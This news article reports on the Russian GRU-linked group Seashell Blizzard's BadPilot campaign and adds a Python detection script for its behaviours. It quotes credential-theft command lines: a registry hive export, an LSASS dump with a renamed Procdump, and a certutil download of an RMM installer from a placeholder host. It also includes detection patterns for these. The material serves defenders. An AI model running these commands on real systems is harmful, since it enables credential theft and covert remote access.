"BadPilot" Campaign From Russian APT Poses Ongoing Cyber Threat to Western Nations
An extensive array of threat capabilities associated with Seashell Blizzard (aka APT44, Sandworm, UAC-0145, Voodoo Bear), a cyber threat actor linked to Russian Military Intelligence Unit 74455 (GRU), has emerged following an expansion in its operations beyond Eastern Europe, targeting organizations across the United States, Canada, Australia, Europe, Central Asia, and the Middle East. According to Microsoft Threat Intelligence, the group’s BadPilot campaign has affected critical sectors, with recent activity focused on energy, oil and gas, telecommunications, shipping, and defense manufacturing. "Since early 2024, the subgroup has expanded its range of access to include targets in the United States and the United Kingdom," with ongoing operations "built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East." Seashell Blizzard has leveraged techniques to establish long-term persistence on compromised systems, enabling espionage, information operations, and destructive cyberattacks. Microsoft also cautions, "Seashell Blizzard’s specialized operations have ranged from espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks and manipulation of industrial control systems (ICS)," referencing the group's use of wiper malware.
The BadPilot campaign exploits multiple vulnerabilities to gain initial access to targeted networks. Exploited vulnerabilities observed by Microsoft include Microsoft Exchange ProxyShell (CVE-2021-34473), Zimbra Collaboration (CVE-2022-41352), OpenFire (CVE-2023-32315), JetBrains TeamCity (CVE-2023-42793), Microsoft Outlook (CVE-2023-23397), ConnectWise ScreenConnect (CVE-2024-1709), Fortinet FortiClient EMS (CVE-2023-48788), and JBOSS (exact CVE unknown). A primary attack chain from the group's recent campaigns, which Microsoft dates from February 24, 2024 to the present, focuses on deploying remote monitoring and management (RMM) tools. Once access is achieved, Seashell Blizzard downloads RMM tools using living-off-the-land binaries such as "bitsadmin," "curl," and "certutil," then uses Atera Agent, Splashtop, and ScreenConnect to maintain command and control over compromised systems. Following RMM installation, the group steals credentials through registry hive exports (reg save HKLM\SYSTEM C:\ProgramData\sys), LSASS process dumps taken with a renamed Procdump, and Task Manager for additional credential harvesting. Data exfiltration is carried out with Rclone. Another notable post-exploitation action was the deployment of OpenSSH to reinforce persistence and command-and-control (C2).
A second attack pattern, observed since late 2021, centers on web shell deployment. Key vulnerabilities exploited include those in Microsoft Exchange and Zimbra, allowing Seashell Blizzard to install web shells that run rapid reconnaissance and maintain persistent network footholds. These web shells run system fingerprinting commands such as "systeminfo," "arp -a," and "whoami" to gather information about the target environment. Additionally, the threat actors deploy tunneling tools like Chisel, plink, and rsockscan to create encrypted communication channels, enabling lateral movement that is difficult to detect. "Seashell Blizzard carried out measures to establish long-term persistence on affected systems," allowing for prolonged intelligence-gathering and network manipulation operations.
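The behaviours in the two preceding paragraphs (LOLBin downloads of RMM installers, the reg save hive export, LSASS dumps via a renamed Procdump, and fingerprinting commands spawned by a web shell) map cleanly onto process-creation telemetry. The following is an added detection example written for this article, not code from Microsoft's report; it assumes Sysmon Event ID 1 style fields (ParentImage, Image, OriginalFileName, CommandLine), that Procdump's PE OriginalFileName is "procdump", and that w3wp.exe is the web server worker hosting Exchange. The sample events are constructed.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation event (Sysmon Event ID 1 style fields)."""
    parent: str     # ParentImage file name
    image: str      # Image file name as executed on disk
    orig_name: str  # OriginalFileName from PE version info (survives renaming)
    cmdline: str    # CommandLine

RMM_HINTS = ("atera", "splashtop", "screenconnect")  # RMM tools named in the report

def detect(ev: ProcEvent) -> list[str]:
    """Return the BadPilot-style behaviours this single event matches."""
    img, orig = ev.image.lower(), ev.orig_name.lower()
    cmd, parent = ev.cmdline.lower(), ev.parent.lower()
    hits = []
    # 1. LOLBin download over HTTP(S); flag separately if an RMM installer is named
    if img in ("bitsadmin.exe", "curl.exe", "certutil.exe") and re.search(r"https?://", cmd):
        hits.append("lolbin_download")
        if any(h in cmd for h in RMM_HINTS):
            hits.append("rmm_installer_fetch")
    # 2. Credential theft via hive export: reg save HKLM\SYSTEM (or SAM/SECURITY) <path>
    if img == "reg.exe" and re.search(r"\bsave\b\s+hklm\\(system|sam|security)\b", cmd):
        hits.append("registry_hive_export")
    # 3. LSASS dump with Procdump; OriginalFileName exposes it even when renamed (assumed value)
    if orig == "procdump" and "lsass" in cmd:
        hits.append("lsass_dump_procdump" if img in ("procdump.exe", "procdump64.exe")
                    else "lsass_dump_renamed_procdump")
    # 4. Host fingerprinting spawned by the IIS worker: the web-shell pattern
    if parent == "w3wp.exe" and img in ("systeminfo.exe", "arp.exe", "whoami.exe"):
        hits.append("webshell_recon")
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> detections, omitting events with none."""
    return {i: h for i, ev in enumerate(events) if (h := detect(ev))}

# Constructed sample telemetry for illustration, not from any real incident.
SAMPLE = [
    ProcEvent("cmd.exe", "certutil.exe", "CertUtil.exe",
              "certutil -urlcache -split -f https://example.invalid/AteraAgent.msi C:\\Users\\Public\\a.msi"),
    ProcEvent("cmd.exe", "reg.exe", "reg.exe", "reg save HKLM\\SYSTEM C:\\ProgramData\\sys"),
    ProcEvent("cmd.exe", "svchost2.exe", "procdump", "svchost2.exe -ma lsass.exe out.dmp"),
    ProcEvent("w3wp.exe", "whoami.exe", "whoami.exe", "whoami"),
    ProcEvent("explorer.exe", "curl.exe", "curl.exe", "curl --version"),  # benign, no hit
]

if __name__ == "__main__":
    for i, hits in scan(SAMPLE).items():
        print(i, hits)
```

The benign curl invocation in the sample produces no hit, which is the point of keying rule 1 on a URL in the command line rather than on the binary name alone.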
Another key tactic involves modifying victim infrastructure to collect credentials and extend the group's reach within networks. Between late 2021 and 2024, Seashell Blizzard altered Outlook Web Access (OWA) sign-in pages and DNS configurations to harvest credentials. JavaScript-based modifications to OWA login portals captured and transmitted credentials in real time to attacker-controlled infrastructure. Additionally, DNS A record modifications suggest the possibility of credential interception from authentication services. These tactics provide Seashell Blizzard with expanded access, reinforcing its ability to manipulate networks at a strategic level.
Microsoft Threat Intelligence warns that Seashell Blizzard’s operations align with Russia’s geopolitical objectives, particularly in the context of the Ukrainian conflict. "Seashell Blizzard’s far-reaching, opportunistic access methods likely offer Russia expansive opportunities for niche operations and activities that will continue to be valuable over the medium term."